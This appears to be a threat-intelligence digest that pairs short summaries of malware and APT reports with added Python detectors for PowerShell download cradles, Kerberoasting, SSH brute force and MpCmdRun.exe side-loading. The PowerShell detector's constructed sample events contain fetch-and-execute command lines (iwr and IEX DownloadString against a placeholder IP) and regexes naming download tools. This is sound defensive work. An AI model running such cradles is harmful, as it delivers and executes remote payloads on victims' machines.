UNC3890 is an Iran-linked threat cluster tracked by Mandiant that targets Israeli shipping, government, energy and healthcare organizations using social-engineering lures and watering holes. The operation leverages a backdoor (SUGARUSH), a credential stealer (…
Tag: INITIAL ACCESS
Cyble researchers uncovered a phishing site impersonating Lindesbergs Kommun that delivers Typhon Stealer via a crafted .lnk file which launches PowerShell to download the payload. The stealer harvests data from browsers, wallets, gaming apps, and messaging tools, with e…
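The delivery chain above (a shortcut file that spawns PowerShell to fetch a payload) leaves a recognisable process-creation trail: PowerShell started by Explorer, hidden-window and policy-bypass switches, and a download cradle that is often wrapped in `-EncodedCommand`. The detection logic below is an added example written for this page, not code from Cyble or from the report; the Sysmon-style event records are constructed, and the hostnames, paths and URL are placeholders. It decodes the UTF-16LE base64 form PowerShell uses for `-enc` before scanning, so an encoded cradle is scored the same as a plain one.

```python
import base64
import re
from typing import Optional

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_PATTERNS = re.compile(
    r"(invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|invoke-restmethod|\birm\b)",
    re.IGNORECASE,
)
EVASION_PATTERNS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile)",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 token
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def _encode_ps(script: str) -> str:
    """Build the base64 form PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 (process creation) records for this example.
# They are made up to illustrate the pattern, not telemetry from the Cyble report.
SAMPLE_EVENTS = [
    {   # Shortcut double-clicked in Explorer: hidden window, policy bypass, download cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": (r'powershell.exe -w hidden -nop -ep bypass -c "iwr http://198.51.100.7/update.exe '
                        r'-OutFile $env:TEMP\update.exe; Start-Process $env:TEMP\update.exe"'),
    },
    {   # Same delivery, but the cradle is hidden behind -enc
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"),
    },
    {   # Benign interactive use from a console
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -Command Get-ChildItem C:\Users",
    },
    {   # Admin downloading a file from a console: a cradle, but nothing else
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -Command Invoke-WebRequest https://example.com/file.zip -OutFile C:\tmp\file.zip",
    },
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none / it is malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation record for the LNK -> PowerShell -> download pattern."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    scan_text = cmd if decoded is None else cmd + "\n" + decoded   # scan both forms
    indicators = []
    if image in PS_IMAGES and parent == "explorer.exe":
        indicators.append("powershell_spawned_by_explorer")   # shortcut / double-click launch
    if decoded is not None:
        indicators.append("encoded_command")
    if EVASION_PATTERNS.search(scan_text):
        indicators.append("hidden_or_bypass_flags")
    if DOWNLOAD_PATTERNS.search(scan_text):
        indicators.append("download_cradle")
    # A cradle alone is what admins type; a cradle plus any other indicator is worth a look.
    suspicious = image in PS_IMAGES and "download_cradle" in indicators and len(indicators) >= 2
    return {"image": image, "parent": parent, "indicators": indicators,
            "decoded": decoded, "suspicious": suspicious}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze_event(ev)
        print(r["suspicious"], r["indicators"])
```

The parent-process check is the cheapest signal here: a shortcut opened from a mail attachment or download folder is launched by Explorer, whereas scripted administration normally comes from a console, a scheduler, or a management agent. Tune `DOWNLOAD_PATTERNS` to the cradles seen in your own telemetry; the list above is a starting point, not a complete one.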
Morphisec Labs details DoNot Team (APT-C-35) updates to their Windows framework (YTY/Jaca), including new modules, a shellcode loader, and an upgraded browser stealer, with a focus on modular delivery and evasion techniques. The post also highlights infection …
The article compiles a large set of file hash indicators tied to Zeppelin ransomware activity as described in the CISA alert AA22-223a, associated with the StopRansomware campaign. It presents these indicators in a purely IOC-focused format without narrative d…
Cisco Talos and CSIRT describe a May 2022 compromise in which a Cisco employee’s Google account credentials (synced from a personal browser) enabled initial VPN access after MFA bypass via vishing and MFA fatigue. The investigation links the actors to an initi…
Unit 42 analyzes Tropical Scorpius (UNC2596) activity, detailing Cuba Ransomware’s evolution with new tools like ROMCOM RAT, KerberCache, and a kernel driver to defeat defenses, plus its connection to the Industrial Spy marketplace. The report covers ransomwar…
An April 2022 intrusion saw BumbleBee act as the initial access loader, enabling multi-stage payloads and outbound C2 communication within a Windows environment. The operation featured credential dumping, Kerberoasting, privilege escalation tooling, and Cobalt…
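Kerberoasting, named above as one of the post-access steps, shows up in domain-controller telemetry as a burst of TGS requests (Security Event ID 4769) from one account for many different service accounts, typically downgraded to RC4 so the tickets crack faster offline. The detector below is an added example for this page, not code from the report; the 4769 records are constructed, and the account and service names are placeholders. It filters out the noise that is always present (krbtgt, computer accounts, AES tickets) and then looks for distinct services per requesting account inside a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket encryption types as logged in 4769: 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP,
# 0x11/0x12 = AES128/AES256. RC4 requests for user-owned SPNs are the roasting signal.
RC4_TYPES = {"0x17", "0x18"}

# Constructed 4769 records (fields trimmed to what the check needs). Made up for
# this example; not data from the intrusion described above.
SAMPLE_4769 = [
    {"time": "2022-04-12T10:01:05", "account": "jdoe@CORP.LOCAL", "service": "svc_sql",    "enc": "0x17", "status": "0x0", "src": "10.0.0.25"},
    {"time": "2022-04-12T10:01:06", "account": "jdoe@CORP.LOCAL", "service": "svc_web",    "enc": "0x17", "status": "0x0", "src": "10.0.0.25"},
    {"time": "2022-04-12T10:01:07", "account": "jdoe@CORP.LOCAL", "service": "svc_backup", "enc": "0x17", "status": "0x0", "src": "10.0.0.25"},
    {"time": "2022-04-12T10:01:08", "account": "jdoe@CORP.LOCAL", "service": "svc_ftp",    "enc": "0x17", "status": "0x0", "src": "10.0.0.25"},
    {"time": "2022-04-12T10:01:09", "account": "jdoe@CORP.LOCAL", "service": "krbtgt",     "enc": "0x12", "status": "0x0", "src": "10.0.0.25"},
    {"time": "2022-04-12T10:02:00", "account": "alice@CORP.LOCAL", "service": "svc_sql",   "enc": "0x12", "status": "0x0", "src": "10.0.0.31"},  # normal AES request
    {"time": "2022-04-12T10:05:00", "account": "bob@CORP.LOCAL",  "service": "svc_web",    "enc": "0x17", "status": "0x0", "src": "10.0.0.40"},  # one legacy client
    {"time": "2022-04-12T10:06:00", "account": "WS01$@CORP.LOCAL", "service": "FS01$",     "enc": "0x17", "status": "0x0", "src": "10.0.0.50"},  # computer-to-computer
    {"time": "2022-04-12T10:30:00", "account": "jdoe@CORP.LOCAL", "service": "svc_sql",    "enc": "0x17", "status": "0x0", "src": "10.0.0.25"},  # outside the window
]


def find_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return one finding per account that requested >= min_services distinct RC4
    service tickets for user-owned SPNs within `window`."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["status"] != "0x0" or ev["enc"] not in RC4_TYPES:
            continue                                   # failed or AES: not roastable
        svc = ev["service"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue                                   # TGT renewals and machine accounts
        by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), svc, ev["src"]))

    findings = []
    for account, rows in by_account.items():
        rows.sort()
        for i, (t0, _, src) in enumerate(rows):
            burst = [r for r in rows[i:] if r[0] - t0 <= window]
            services = sorted({r[1] for r in burst})
            if len(services) >= min_services:
                findings.append({"account": account, "source": src, "start": t0.isoformat(),
                                 "services": services, "rc4_requests": len(burst)})
                break                                  # one finding per account is enough
    return findings


if __name__ == "__main__":
    for f in find_kerberoasting(SAMPLE_4769):
        print(f)
```

Two caveats a practitioner would want: a single legacy client that genuinely needs RC4 (bob above) produces steady, low-cardinality traffic and is excluded by the distinct-service threshold rather than by the encryption type alone; and an attacker who requests AES tickets is invisible to the `RC4_TYPES` filter, so the cardinality check is worth running on all encryption types as a second, lower-confidence rule.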
APT31 renewed its attacks on Russian media and energy companies by leveraging a malicious document that loads a VMProtect-packed payload, linking the activity to the APT31 toolkit. The campaign uses cloud storage services (notably Yandex.Disk) as C2 to blend i…
FortiGuard Labs tracks RapperBot, a rapidly evolving IoT malware family that borrows heavily from Mirai but switches from Telnet to SSH brute forcing for initial access on Linux devices. The campaign shows notable persistence and credential-access capabilities…
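The shift from Telnet to SSH brute forcing means the initial-access evidence lands in sshd's auth log rather than on a Telnet honeypot. The script below is an added example for this page, not code from FortiGuard or from the RapperBot write-up; the auth.log lines are constructed and the addresses are documentation ranges. It parses `Failed`/`Accepted` lines, counts failures per source address inside a sliding window, and, because a brute force that ends in a successful login is the case that matters, reports whether the same address later authenticated and as which user.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log excerpt: one scanner cycling default usernames and
# eventually landing on root, then one legitimate user with a single typo.
AUTH_LOG = """\
Aug 10 12:00:01 host sshd[1201]: Failed password for root from 203.0.113.5 port 40122 ssh2
Aug 10 12:00:02 host sshd[1203]: Failed password for invalid user admin from 203.0.113.5 port 40123 ssh2
Aug 10 12:00:03 host sshd[1205]: Failed password for invalid user pi from 203.0.113.5 port 40124 ssh2
Aug 10 12:00:04 host sshd[1207]: Failed password for invalid user ubnt from 203.0.113.5 port 40125 ssh2
Aug 10 12:00:05 host sshd[1209]: Failed password for root from 203.0.113.5 port 40126 ssh2
Aug 10 12:00:07 host sshd[1211]: Accepted password for root from 203.0.113.5 port 40128 ssh2
Aug 10 12:03:00 host sshd[1300]: Failed password for alice from 192.0.2.10 port 51000 ssh2
Aug 10 12:03:09 host sshd[1302]: Accepted publickey for alice from 192.0.2.10 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return one finding per source IP with >= threshold failed logins inside
    window_seconds, noting whether that IP later authenticated successfully."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                   # not an auth result line
        # syslog timestamps carry no year; deltas inside one log are still correct
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        by_ip[m["ip"]].append((ts, m["result"], m["user"]))

    findings = []
    for ip, rows in by_ip.items():
        rows.sort(key=lambda r: r[0])
        failures = [r for r in rows if r[1] == "Failed"]
        for i, (t0, _, _) in enumerate(failures):
            burst = [r for r in failures[i:] if (r[0] - t0).total_seconds() <= window_seconds]
            if len(burst) < threshold:
                continue
            later_success = next((r for r in rows if r[1] == "Accepted" and r[0] >= t0), None)
            findings.append({
                "ip": ip,
                "window_start": t0.strftime("%b %d %H:%M:%S"),
                "failures": len(burst),
                "users_tried": sorted({r[2] for r in burst}),
                "succeeded": later_success is not None,
                "success_user": later_success[2] if later_success else None,
            })
            break                                      # one finding per IP
    return findings


if __name__ == "__main__":
    for f in detect_ssh_bruteforce(AUTH_LOG):
        print(f)
```

A `succeeded: True` finding is the one to page on: it means the credential guess landed and the device should be treated as compromised rather than merely scanned. The `users_tried` list (default device accounts such as `pi` and `ubnt` here) is a useful fingerprint for distinguishing IoT-focused credential lists from targeted guessing against real user names.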
Dark Utilities is a C2-as-a-Service platform released in early 2022 that provides remote access, DDoS, and cryptocurrency mining capabilities, with payloads for Windows, Linux, and Python hosted on IPFS to resist takedowns. Since launch, malware samples have r…
Projector Libra (EXOTIC LILY) distributes Bumblebee via email campaigns that use file-sharing services to deliver malware, replacing the previous loader BazarLoader. The campaign chains ISO images with Windows shortcuts to execute Bumblebee, often followed by …
LOLI Stealer is a Golang-based infostealer sold via a MaaS model, capable of stealing passwords, cookies, wallet data, and screenshots from infected machines. Cyble Research Labs tracked LOLI Stealer and its evolving capabilities, including data exfiltration t…
Robin Banks is a phishing-as-a-service (PhaaS) platform that sells ready-made phishing kits targeting financial information for users in the U.S., U.K., Canada, and Australia. IronNet researchers observed a large-scale June 2022 campaign using Robin Banks to s…
LockBit operators have been observed abusing legitimate security tools to load Cobalt Strike beacons, deploying a living-off-the-land approach to evade defenses. The campaign pivots on using MpCmdRun.exe to decrypt and load a weaponized DLL, following prior si…
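The living-off-the-land trick above relies on a signed Microsoft binary (MpCmdRun.exe) being run from a location the attacker controls so that it picks up a DLL placed beside it. The check below is an added example for this page, not code from the LockBit write-up or from any vendor: it scores a Sysmon Event ID 7 (ImageLoad) record on three things a practitioner can verify from telemetry alone, namely the binary running outside Defender's install or platform directory, a non-system DLL loaded from outside those directories, and the loaded module's signature status. The Defender directory paths and the sample records are assumptions made for the example; the summary does not name the DLL or describe the decryption step, and this check does not depend on either.

```python
from pathlib import PureWindowsPath

# Where Defender's own binaries live (assumption for this example). The platform
# folder carries a version number that varies per host, so we match on the prefix.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)
WINDOWS_DIR = "c:\\windows\\"   # system DLLs legitimately come from here

# Constructed Sysmon Event ID 7 records for this example (not from the report).
SAMPLE_IMAGE_LOADS = [
    {   # Normal: Defender's own tool loading its own module from the platform folder
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MpCmdRun.exe",
        "ImageLoaded": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MpClient.dll",
        "SignatureStatus": "Valid",
    },
    {   # Relocated copy of the tool picking up a DLL dropped next to it
        "Image": r"C:\Users\Public\Libraries\MpCmdRun.exe",
        "ImageLoaded": r"C:\Users\Public\Libraries\MpClient.dll",
        "SignatureStatus": "Unavailable",
    },
    {   # Normal: a system DLL loaded from C:\Windows
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MpCmdRun.exe",
        "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
        "SignatureStatus": "Valid",
    },
]


def _under(path: str, roots) -> bool:
    """True if `path` is one of `roots` or lies beneath one of them (case-insensitive)."""
    p = path.lower().rstrip("\\")
    return any(p == root or p.startswith(root + "\\") for root in roots)


def check_mpcmdrun(event: dict):
    """Score one ImageLoad record; returns None for processes other than MpCmdRun.exe."""
    image = PureWindowsPath(event["Image"])
    if image.name.lower() != "mpcmdrun.exe":
        return None
    image_dir = str(image.parent)
    loaded = PureWindowsPath(event["ImageLoaded"])
    loaded_dir = str(loaded.parent)
    reasons = []
    if not _under(image_dir, DEFENDER_DIRS):
        reasons.append("mpcmdrun_outside_defender_dir")
    if loaded.suffix.lower() == ".dll":
        in_system = loaded_dir.lower().startswith(WINDOWS_DIR)
        if not in_system and not _under(loaded_dir, DEFENDER_DIRS):
            reasons.append("dll_loaded_outside_defender_dir")
            # the classic side-load geometry: binary and DLL copied into the same attacker folder
            if loaded_dir.lower() == image_dir.lower() and "mpcmdrun_outside_defender_dir" in reasons:
                reasons.append("dll_colocated_with_relocated_binary")
        if event.get("SignatureStatus", "Unknown") != "Valid":
            reasons.append("signature_not_valid")
    return {"image": str(image), "loaded": str(loaded), "reasons": reasons,
            "suspicious": bool(reasons)}


if __name__ == "__main__":
    for ev in SAMPLE_IMAGE_LOADS:
        print(check_mpcmdrun(ev))
```

The same three checks generalise to any signed-binary side-load: the interesting event is not the binary's name but the mismatch between where it is supposed to live and where it and its dependencies are actually being loaded from. Sysmon's `SignatureStatus` field is only populated when image-load signature checking is enabled in the configuration, which is why the code treats a missing value as not valid rather than silently passing it.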
Sophos X-Ops describes a coordinated Observe-Orient-Decide-Act loop among SophosLabs, SecOps, MTR, and Sophos AI to study and disrupt a wave of Microsoft SQL Server attacks leveraging old RCE CVEs and delivering Remcos or various ransomware families including …